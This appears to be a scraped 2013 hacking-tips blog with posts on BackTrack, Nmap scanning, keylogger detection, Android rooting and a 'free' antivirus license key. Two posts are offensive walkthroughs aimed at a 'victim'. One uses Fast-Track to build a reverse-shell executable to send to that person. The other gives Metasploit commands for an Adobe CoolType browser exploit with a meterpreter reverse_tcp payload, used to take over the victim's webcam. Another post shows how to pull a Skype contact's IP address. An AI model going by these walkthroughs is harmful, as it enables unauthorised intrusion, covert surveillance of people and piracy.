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Sunday 20 October 2013

GET IP Address through Skype :

By on 03:14
GET IP Address through Skype : 

1. When you're in the Skype call press alt + crtl + delete and go into Task Manager.
2. When you're in Task Manager click on the Performance tab.
3. Once you're in the performance tab click on resource monitor.
4. Now tick skype.exe and look in the Network Activity box below, you should see you sending information and receiving information and it has their
I.P Address.

Remember this doesn't work 100% of the time but it is quite accurate .

Saturday 19 October 2013

how to make business account on facebook

By on 04:30
Hello guys its me your friend Saiban Ahmad with a very new tutorial....
In this tutorial I an going to teach you how to make a business account on Facebook so without wasting time lets start...

1)First of all goto main page of facebook and Click on CREATE PAGE.

2)Now choose the category of your page a agree the term and conditions of Facebook and click on get started.

3)On the next page click ON create a new business account 

4)On the next page you will see a form , Fill that form and create your business account

Friday 18 October 2013

Nmap Scanning On Backtrack 5

By on 08:31

Learn Nmap Scanning On Backtrack 5 Environment 

Nmap is a program that scans all of the ports in your computer and check it  whether they are open or not.

So lets start the scanning process in Backtrack 5 Environment .

Ping Scan 

Range Scan 

Stealth Scan (-sS) 

OS SCAN : It showed us which Operating system is running by 
             the host.

TCP SCAN : This scan will show all the open tcp ports . 


  1. Speed
  2. Free to use 
  3. Don't need priviledges
  1. Easily Detectable and Filterable .



In udp scanning we use udp scan instead of tcp scan .

Protocol Scan -sO <Target Ip >


This Scan is used to find the ip protocols in use .

Regards xnonymoux.com

Zenmap Port Scanner

By on 08:30
Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use .

To start Zenmap on Backtrack 5 KDE  : click on Dragon>Internet >click Zenmap (shown below )

Now when you open Zenmap Port Scanner you will see a window like this :-

After this step you have to enter the ip4 address of  Target OS (here i use windows as a target system and its ip is
 Now enter target ip address and then select type of scan listed below :-

Here i use intense scan and click on Scan Button.

After scanning the next window shows you all the ports which are open in windows XP .

This is how we scan the Target system for open ports on windows Operating System.
Regard,s Xnonymoux.com

Install backtrack via usb drive

By on 08:28


BackTrack is one of the best Linux distributions which is purely focused on penetration testing and is preloaded with several industry standard security and hacking tools like network analysers, wireless tools, fuzzers, crackers etc.. As like other Linux distributions BackTrack is also designed to boot and use from cd/dvd(called as live cd) but in some cases you may need to use BackTrack with your USB device. So in this post HPH will show you how to do it.
Even though BackTrack is designed to be used from live cd/dvd, it can also be used as a live USB drive. The process to make your live BackTrack USB drive is a piece of cake when you follow the 4 simple steps below.

Minimum Requirements:

  • USB device with 2+ GB space(4 GB is recommended)
  • BackTrack ISO file, If you don’t have the current latest version you can go download here.
  • A software application called Unetbootin, It is free an you can download it from here.
  • Five minutes of your precious time.

Steps to be followed:

Step #1: Plug-in your USB drive.
Step #2: Start the application Unetbootin.
Step #3: Now select the radio button DiskImage and click browse to select your BackTrack ISO.
Step #4: On the below select your USB drive letter and click OK to create bootable BackTrack USB.
That’s it your are done, you had successfully created your bootable USB BackTrack device. You can now boot and login to your BackTrack with the default username(root) password(toor).
Note: Make sure you select your USB as first boot device in your BIOS.
Regards xnonymoux.com

How to run Google Chrome in Backtrack

By on 08:26
Hey Friends i am back, sorry for posting late. Everyone wants to run google chrome in backtrack but it cannot be run in root user, but i have a way just follow all the steps:------>
1. Download google chrome from here.
2. After downloading chrome open directory file system/usr/bin and then find for google chrome and the open the file with gedit text editor.

3. Now at the end just paste this "--user-data-dir" without qoutes like in image.
4. Now save the file and now it will open and start enjoying the internet  - See more at:
Regard,s xnonymoux.com

Hacking a Computer using fastrack and backtrack

By on 08:24

Hacking a Computer using fastrack and backtrack

Hey friends i found a latest hack or way to hack into a computer which has a windows operating system.
Ok then lets start.Here are some requirments:-------->
1. Backtrack 
2. Ip address of victim.
3. Brain.
Now follow all the steps according to this post:--------------->
1. Open Fastrack by clicking on Applications-->Backtrack-->Exploitation tools-->Network exploitation tools-->Fast-Track-->fasttrack-interactive.

2. Now after opening fastrack select the option Payload generator by typing 8 and hitting enter.

3. Now after that type 1 to select Windows Shell Reverse_TCP and hit enter.

4. Now after that type 2 to select shikata_ga_nai and hit enter.

5. Now after that enter the ip address of victim and hit enter.
6. Now you have to scan ip address to get open ports refer to this article.

7. If you get any open ports then enter it like in image.
8. After that type 3 to select Executable and hit enter, this option will create a executable file in  directory filesystem-->pentest>exploit-->fasttrack-->payload.exe.
9. Now the send executable file to victim and when the victim open this file you will be connected to computer remotely.
Regards, xnonymoux.com

Hack victim webcam

By on 08:21

Our real purpose is to show just how easy it is, so you will take better awareness that it can be done, and  take security yourself.

Open Metasploit and run following commands:

msf>  show exploits

msf>use windows/browser/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp

msf  exploit(adobe_cooltype_sing) > show options

Module options (exploit/windows/browser/adobe_cooltype_sing):

   Name                Current Setting       Required           Description
   ----                     ---------------               --------               -----------
   SRVHOST                     yes              The local host to listen on. This must be an address on the local machine or
   SRVPORT             8080                      yes              The local port to listen on.
   SSL                         false                         no                Negotiate SSL for incoming connections
   SSLCert                                                   no               Path to a custom SSL certificate (default is randomly generated)
   SSLVersion         SSL3                        no               Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                                              no               The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name                  Current            Setting         Required  Description
   ----                    ---------------       --------              -----------
   EXITFUNC        process             yes               Exit technique: seh, thread, process, none
   LHOST                                             yes                The listen address
   LPORT                 4444                 yes               The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf  exploit(adobe_cooltype_sing) > set SRVHOST
msf  exploit(adobe_cooltype_sing) > set SRVPORT 80
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) > set uripath /
uripath => /
msf  exploit(adobe_cooltype_sing) >exploit -j

Let the victim open your IP in his/her browser and when it will be opened, you will get 1 meterpreter session.

msf  exploit(adobe_cooltype_sing) > session -i 1

meterpreter> run webcam

and you will get the webcam of victim. :)
Regards, xnonymoux.com

Tuesday 15 October 2013

Free Download ESET NOD32 Beta 6 With Full License Key

By on 01:49
ESET NOD32 Antivirus Beta 6 Free Download With License KeyAvailable Here. Easily ESET NOD32 Antivirus 6 Full Version Download And Use To Protection Of Your PC.

Free Download ESET NOD32 Antivirus Beta 6 With Full License Key, ESET NOD32 Antivirus Full Download

Image :Free Download ESET NOD32 Antivirus Beta 6 With Full License Key

>> ESET NOD32 Antivirus 6 Free Download is an advanced solution that provides virus protection from viruses and spyware, so that a minimum footprint of IT resources.
A key feature in NOD32 Smart-defense system that groups managed to protect your computer without messing about with pop-ups or messages. Another notable feature of this virus is an ant'''' defense that tries to disable malware functions.

>> NOD32 has a clean interface to use and easy to hide, despite a large number of parameters under the hood. The two scan modes, smart and personal way, you can quickly check the entire hard disk or removable media such as certain areas, local or network drives.
When activated, the high-Host-based Intrusion Protection System (HIPS) continuously monitors the activity on your computer, if the flag is raised suspicious actions are detected.

>> ESET Antivirus software solution, designed specifically with popular mail clients in the market, such as Mozilla Thunderbird, Microsoft Outlook or Outlook Express to work. NOD32 is its connection to engine threat scanner, which uses both heuristics and generic signatures to protect your system from all hazards is based.

>> The scanning process is very fast and do not put so much pressure on system resources. The customization options are available in number, but the defaults are well balanced, not a team to their portfolio risk.

>> If you add a personal touch to the protection of the system or interface configuration, you can see up close the advanced settings and play with the many options available. For more details about a feature that provides the help section comprehensive.

>> NOD32 system includes password protection to ensure that unauthorized users can not disable, modify, or remove. It also allows a couple of system tools, namely ESET SysInspector and Syracuse, a deeper insight into the system and creates hot spares.

>> Among the best things about NOD32 is its engine, with some smart features, a safe environment, which requires only a small part of system resources to provide. The range of online and offline protection very good and wide adaptability makes remarkable ant virus ESET solution, especially for home users. - See more at: 

How to detect that a keylogger is installed on a computer or not

By on 01:43

How to detect that a keylogger is installed on a computer or not

Key loggers are software that traces the key strokes on your computer.NOW a days key loggers are mainly used for hacking.So it is IMPORTANT to protect your data from keylogger. It is done in such a way that a person using the computer is unaware of the fact that a key logger is installed on a particular PC.
How does  keyloggers enters your computer ?
There are several ways in which a key logger

can get into your computer either it is directly installed or it is indirectly transferred to your computer. Most of the time, this malicious file enters a computer when the user downloads an infected application like movies, music or other software applications.
So how to get rid of  keyloggers that is installed on a computer

1. Use updated antivirus and anti spyware
Some of the good anti viruses have capability to detect key loggers. So you should update your antiviruses regularly so that it gets updated for new keyloggers.

2. Use Anti keyloggers
There are anti keyloggers available that will make the task easy for you in finding a keyloggers. Use these softwares if you think there is a high possibility of keyloggers on a computer. The anti keyloggers that i will suggest you is Cyberhawk. Even  Kasperky does a good job in this area too. Also check anti-spy.info. More examples:
·                                 http://www.microsoft.com/athome/security/spyware/software/default.mspx
·                                 http://www.lavasoftusa.com/software/adaware/
·                                 http://security.kolla.de/
·                                 http://www.clamwin.com

3. Search for keyloggers yourself
Keyloggers have the capability that they hide them self from the user but are active in the background. There are some shortcuts that are used to see them live on screen
For example : Ctrl + Alt + X or Ctrl + Alt + Wondows Key + X or desktopshark  etc.

4. Use special tools
Freeware on demand keylogger scanner.
 Freeware antikeylogger that block hook based keyloggers as well as screen captures. For Windows XP.
PSMAntiKeyLogger is a real-time protecting software which protects you against Keyloggers. No scanning is needed.
I Hate Keyloggers

How to Format USB Pen Drives Using Command Prompt to Delete Viruses Permanently

By on 01:41
When you're using a pen drive to transfer data between PCs, the common problem is viruses. You might format your pen drive many times because of viruses. Some kind of viruses never get delete by normal formatting. Are you disappointed of the result that you get after formatting your pen drive and still find viruses in it?

Here I'll give you a solution to format your USB pen drive completely.

You can format pen drives using command prompt to remove all the virus files permanently. Most of the times these type of formats delete all the viruses from pen drive.

So let's see how to format your pen drive using command prompt.

Insert pen drive into your PC

Find the drive letter of the pen drive

Now click on Start ---> Run

In run box, type cmd and hit Enter

Now command prompt will appear, in this window type format "your pen drive letter:"
For example type : format g:

Hit Enter twice

Wait for sometime until command prompt verify the file system.

How to Format USB Pen Drives Using Command Prompt to Delete Viruses Permanently

Now command prompt will ask you to enter a drive name.

After that type the drive name and then hit Enter again.

How to Format USB Pen Drives Using Command Prompt to Delete Viruses Permanently

That's all, you have done !!!

Monday 14 October 2013

HTC wildfire 2.2.1 root to HTC wildfire Android 2.3

By on 23:57
ometime ago I got an HTC Wildfire and was having loads of fun using it, but every time I wanted to do anythingHTC wildfire 2.2.1 root to HTC wildfire Android 2.3 | Install Android 2.3 on HTC Wildfire | How to root Htc Wildfire 2.2.1more  "creative" i was stopped by the binded nature of phone, hence i decided to root it (jailbreak it apple fellas) and get complete control over my device. Here, I am covering step by step guide to root HTC wildfire 2.2.1 and install Android 2.3 on HTC Wildfire.
To do the rooting you must have your Wildfire with S-OFF, HBOOT 1.02.0002 and Android 2.2.1 . You can check it by booting into HBOOT (power on your phone by holding the VOLUME DOWN + POWER button) .This method is strictly for the 2.2.1 owners. How you can turn the S-OFF is your headache, you can try the alpharev (ask the team if they can get you a 2.0 test version... :P) or you can wait for Unrevoked 3.33 or you can straight off go to market and hunt for XTC clip. Either way, try it and don't attempt to anything before you get S-OFF. Actually the notorious S-ON flag is the cause rooting wildfire is such a pain in the a**. 
I used to have this
Android 2.2.1
and I converted it into this :)

or this =)
Anyways, here is how you can root HTC wildfire 2.2.1 and get htc wildfire Android 2.3
What you need ?
  • HTC wildfire with S-OFF , HBOOT 1.01.0002 , OS Froyo 2.2.1
  • USB Drivers (Download)
  • RUU Rom 2.1 / RUU_Buzz_HTC_WWE_1.14.405.2_R_Radio_13.45.55.24_3.35.15.31_release_130814_signed (Download)
  • Unrevoked 3.2 Test version (Download)
  • Cyanogenmod 7 (Download) and Google Apps (Download)
  • Time and Patience & last but not the least,
  • Balls of Steel
    I am not responsible if your phone gets bricked, by following the process you are voiding your warranty and significant damage may be caused to your device. 
    Its all for educational purposes only, if you are dumb enough to screw somewhere then I will be the one who will be laughing at you. 
    Software are unpredictable in nature, one may/may not act as predicted especially in case of rooting (personal experience). Hence my friend, tread carefully. 
    in short,
Step 1 - Installing the USB drivers
Download USB drivers and extract them on desktop. Turn off your wildfire and boot into HBOOT by holding the VOLUME DOWN + POWER button. Connect your phone to your PC and it will show "drivers installing" or similar there for Android device. When prompted , install the drivers by going to device manager and browsing to the folder where you extracted the drivers. Once installed, disconnect and reboot your phone normally.
Now you need to install the Android bootloader interface. Connect it to your HTC wildfire to the PC and it will ask for drivers again, now go to device manager, click on unknown device,
click on update driver -> install from specific location -> No i will choose to install -> choose Android phone and click on adb interface -> click next -> when asked to install click on continue anyway, just install them.
Once done you will see your phone recognized as "Android bootloader interface". Now disconnect your phone and go into
settings -> applications - > development - > enable USB Debugging.
Congratulations, the first step is complete.
Step 2 - Downgrading from Android 2.2.1 Froyo to Android 2.1 Eclair
Download the RUU rom which is an original stock rom. Plug your phone into the PC and set it to "Charge through USB". Double click RUU rom .exe. Follow the on screen instructions and then let it install. Your phone will reboot into stock HTC 2.1 :) This will be the last time you will be seeing it though.
The HBOOT version will be now 0.80.0002 (check it by powering on your phone by holding the VOLUME DOWN + POWER button)  Once done disconnect your phone.
Step 3 - Gaining root using UnrEVOked , get clockworkmod and set your phone free :)
Download the test version of unrevoked. Let me repeat, DO NOT USE UNREVOKED 3.32 as it will lead to CID errors or to be precise this error
"validation error backup cid is missing"
This may be caused as the 3.32 doesnot support HBOOT 0.82.0002. Hence You need specific test version of Unrevoked 3.2 to do the job. Download it, save it on desktop, and run it. Now connect your phone and the rooting will start. Once donw, you will have Clockworkmod recovery installed on your phone. Reboot your phone now (using the VOLUME UP/DOWN key for navigation and clicking using TRACKBALL, the POWER button takes you back in menus). Once rebooted, you will see the superuserapp in your phone and congratulations, your phone is successfully rooted :)
Step 4 - Installing Cyanogenmod 7 or Android Gingerbread 2.3.3
Download the Cyanogenmod 7 with google apps and save it on desktop, connect your phone as USB diskdrive and transfer both zip files on SD card. Once done, reboot your phone into ClockworkMod Recovery (booting by holding the VOLUME DOWN + POWER button and clicking on recovery)
Once the device boots into the ClockworkMod Recovery, use the side VOLUME buttons to move around, and either the POWER button or the TRACKBALL to select.
  • Select the option to Wipe data/factory reset.
  • Then select the option to Wipe cache partition.
  • Select Install zip from sdcard.
  • Select Choose zip from sdcard.
  • choose update-cm-7.0.0-buzz-signed.zip & Let it install.
  • Once done, Select Install zip from sdcard.
  • Select Choose zip from sdcard, choose gapps-gb-20110307-signed.zip
  • Once the installation has finished, to get back to the main menu by clicking the POWER button and select the Reboot system now option.
Congrats..The HTC Wildfire should now boot into CyanogenMod.
Finally rooted :)
Android terminal emulator running on superuser privileges
Enjoy Android 2.3.3 :)